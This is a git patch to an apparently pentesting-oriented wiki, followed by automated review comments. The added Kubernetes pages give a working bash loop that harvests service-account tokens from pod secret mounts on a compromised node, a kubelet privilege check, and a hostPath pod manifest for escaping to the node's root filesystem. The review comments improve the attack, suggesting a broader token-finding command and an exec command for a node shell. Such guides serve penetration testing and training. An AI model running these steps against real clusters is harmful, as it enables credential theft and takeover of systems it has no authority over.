From 8a0c6374c5f7972e572d28a57dafca28f0928c16 Mon Sep 17 00:00:00 2001 From: CPol Date: Thu, 23 Dec 2021 12:20:46 +0000 Subject: [PATCH] GitBook: [#2911] No subject --- .../bypass-python-sandboxes/README.md | 27 +--------- pentesting/pentesting-kubernetes/README.md | 4 ++ .../attacking-kubernetes-from-inside-a-pod.md | 39 +++++++++++--- .../enumeration-from-a-pod.md | 10 +++- .../hardening-roles-clusterroles.md | 54 ++++++++++++++++++- 5 files changed, 98 insertions(+), 36 deletions(-) diff --git a/misc/basic-python/bypass-python-sandboxes/README.md b/misc/basic-python/bypass-python-sandboxes/README.md index ca6bf000..4f54c147 100644 --- a/misc/basic-python/bypass-python-sandboxes/README.md +++ b/misc/basic-python/bypass-python-sandboxes/README.md @@ -830,31 +830,7 @@ f(42) ## Decompiling Compiled Python -Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) **** one can **decompile** given compiled python code. - -**Check out this tutorial**: - -{% content-ref url="../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %} -[.pyc.md](../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md) -{% endcontent-ref %} - -## Misc Python - -### Assert - -Python executed with optimizations with the param `-O` will remove asset statements and any code conditional on the value of **debug**.\ -Therefore, checks like - -```python -def check_permission(super_user): - try: - assert(super_user) - print("\nYou are a super user\n") - except AssertionError: - print(f"\nNot a Super User!!!\n") -``` - -will be bypassed +Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) **** one can **decompile** given compiled python code ## References 
@@ -863,4 +839,3 @@ will be bypassed * [https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/](https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/) * [https://gynvael.coldwind.pl/n/python\_sandbox\_escape](https://gynvael.coldwind.pl/n/python\_sandbox\_escape) * [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html) -* [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6) diff --git a/pentesting/pentesting-kubernetes/README.md b/pentesting/pentesting-kubernetes/README.md index a79d64f5..4257a609 100644 --- a/pentesting/pentesting-kubernetes/README.md +++ b/pentesting/pentesting-kubernetes/README.md @@ -48,3 +48,7 @@ Another important details about enumeration and Kubernetes permissions abuse is [hardening-roles-clusterroles.md](hardening-roles-clusterroles.md) {% endcontent-ref %} +## Labs to practice and learn + +* [https://securekubernetes.com/](https://securekubernetes.com) +* [https://madhuakula.com/kubernetes-goat/index.html](https://madhuakula.com/kubernetes-goat/index.html) diff --git a/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md b/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md index e57ebdd1..dea52187 100644 --- a/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md +++ b/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md 
@@ -20,14 +20,6 @@ You can check this **docker breakouts to try to escape** from a pod you have com [docker-breakout](../../linux-unix/privilege-escalation/docker-breakout/) {% endcontent-ref %} -If you managed to escape from the container there are some interesting things you will find in the node: - -* The **Kubelet** service listening -* The **Kube-Proxy** service listening -* The **Container Runtime** process (Docker) -* More **pods/containers** running in the node you can abuse like this one (more tokens) -* The whole **filesystem** and **OS** in general - ### Abusing Kubernetes Privileges As explained in the section about **kubernetes enumeration**: 
@@ -94,3 +86,34 @@ In case the **compromised pod is running some sensitive service** where other po ## Automatic Tools * [https://github.com/inguardians/peirates](https://github.com/inguardians/peirates) + +## Node Post-Exploitation + +If you managed to **escape from the container** there are some interesting things you will find in the node: + +* The **Container Runtime** process (Docker) +* More **pods/containers** running in the node you can abuse like this one (more tokens) +* The whole **filesystem** and **OS** in general +* The **Kube-Proxy** service listening +* The **Kubelet** service listening: Check `/var/lib/kubelet/` specially `/var/lib/kubelet/kubeconfig` + +```bash +# Check Kubelet privileges +kubectl --kubeconfig /var/lib/kubelet/kubeconfig auth can-i create pod -n kube-system + +# Steal the tokens from the pods running in the node +## The most interesting one is probably the one of kube-system +ALREADY="IinItialVaaluE" +for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do + TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/')) + if ! [ $(echo $TOKEN | grep -E $ALREADY) ]; then + ALREADY="$ALREADY|$TOKEN" + echo "Directory: $i" + echo "Namespace: $(cat $i)" + echo "" + echo $TOKEN + echo "================================================================================" + echo "" + fi +done +``` diff --git a/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md b/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md index cce28ed7..522534ab 100644 --- a/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md +++ b/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md @@ -377,7 +377,15 @@ https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/apis/batch/v1bet {% endtab %} {% endtabs %} -**** +### **Get Pods consumptions** + +{% tabs %} +{% tab title="kubectl" %} +``` +./kubectl top pod --all-namespaces +``` +{% endtab %} +{% endtabs %} ### Escaping from the pod 
diff --git a/pentesting/pentesting-kubernetes/hardening-roles-clusterroles.md b/pentesting/pentesting-kubernetes/hardening-roles-clusterroles.md index b7be081a..7529ff3f 100644 --- a/pentesting/pentesting-kubernetes/hardening-roles-clusterroles.md +++ b/pentesting/pentesting-kubernetes/hardening-roles-clusterroles.md @@ -91,7 +91,7 @@ So just create the malicious pod and expect the secrets in port 6666: ![](<../../.gitbook/assets/image (464).png>) -### **Pod Creation - Mount Root (pod escape)** +### **Pod Creation & Escape - Mount Root** Having Pod create permissions over kube-system you can also be able to mount directories from the node hosting the pods with a pod template like the following one: @@ -125,6 +125,58 @@ kubectl --token $token create -f mount_root.yaml And capturing the reverse shell you can find the `/` directory (the entire filesystem) of the node mounted in `/mnt` inside the pod. +**Instead of getting a reverse shell you might just wanto to execute a pod using kubectl with the filesystem mounted and get a shell on it:** + +1. Create a "hostpath volume mount" `pod` manifest. + + ``` + cat > hostpath.yml <
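Review bot: the `### Assert` section removed in the `@@ -830` hunk of misc/basic-python/bypass-python-sandboxes/README.md is the only place on that page that records that `python -O` strips `assert` statements (and any code guarded by `__debug__`), so a permission check written as `assert(super_user)` silently passes under `-O`; nothing in this commit adds it back anywhere. If it is being moved, the destination hunk belongs in the same commit; if it is being deleted, that should be said in the commit message instead of "No subject". Wherever it lands, fix the typo `asset statements` to `assert statements`. The surviving `## Decompiling Compiled Python` line still carries a stray `****` after the link and now ends without a period: `Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) one can **decompile** given compiled python code.`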
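Review bot: dropping the infosecwriteups.com "how assertions can get you hacked" reference in the `@@ -863` hunk is consistent with removing the Assert section, but if that section is relocated to another page the link should travel with it rather than disappear from the corpus.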
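Review bot: the token-harvesting loop added in the `@@ -94` hunk of attacking-kubernetes-from-inside-a-pod.md only matches tmpfs mounts whose path contains both `secret` and `default`, so it misses exactly the tokens worth stealing: pods running under a non-default ServiceAccount have their legacy secret volume named after that account (`<sa>-token-<hash>`, no `default` in the path), and on clusters with bound service-account tokens (projected `kube-api-access-*` volumes, enabled by default since Kubernetes 1.21) it finds nothing at all because those live under `kubernetes.io~projected/`, not `kubernetes.io~secret/`. Walking the kubelet pod directory directly is shorter and catches both: `find /var/lib/kubelet/pods -path '*serviceaccount*' -name token`. Three smaller defects in the same loop: `ALREADY="IinItialVaaluE"` is a placeholder with a typo, `grep -E $ALREADY` treats the dots in the JWTs as regex wildcards, and the unquoted `[ $(...) ]` test breaks on empty output; deduplicating with `sort -u` over the token values is simpler and correct. For the kubelet check above it, `/var/lib/kubelet/kubeconfig` is not universal (kubeadm writes `/etc/kubernetes/kubelet.conf`) and the kubeconfig typically references a client certificate under `/var/lib/kubelet/pki/`, so it has to be used on the node or copied together with that directory. Also, `kubectl auth can-i create pod -n kube-system` only asks the authorizer; it does not consult the NodeRestriction admission plugin, which on a hardened cluster limits a kubelet identity to mirror pods bound to its own node, so a `yes` here is not proof that an arbitrary pod can be created in kube-system. The text should say that the real test is creating one.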
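Review bot: `kubectl top pod --all-namespaces` in the `@@ -377` hunk of enumeration-from-a-pod.md only works when the cluster serves the Metrics API (normally via metrics-server) and the caller can read `pods.metrics.k8s.io`; otherwise it fails with `Metrics API not available`, which a reader might mistake for an RBAC denial, so state that prerequisite next to the command. Heading wording: `Get Pods consumptions` reads better as `Get pod resource consumption`.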
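Review bot: typo in the new lead-in sentence of the `@@ -125` hunk of hardening-roles-clusterroles.md: `you might just wanto to execute a pod` should read `you might just want to run a pod`. The sentence promises a shell on the pod but the step list only shows the manifest heredoc (`cat > hostpath.yml <`, cut off in this view, so the manifest itself could not be reviewed); add the command the reader actually needs afterwards, e.g. `kubectl --token $token exec -it <pod> -n kube-system -- /bin/sh`, and mention that the node filesystem then sits under the mount path chosen in the manifest.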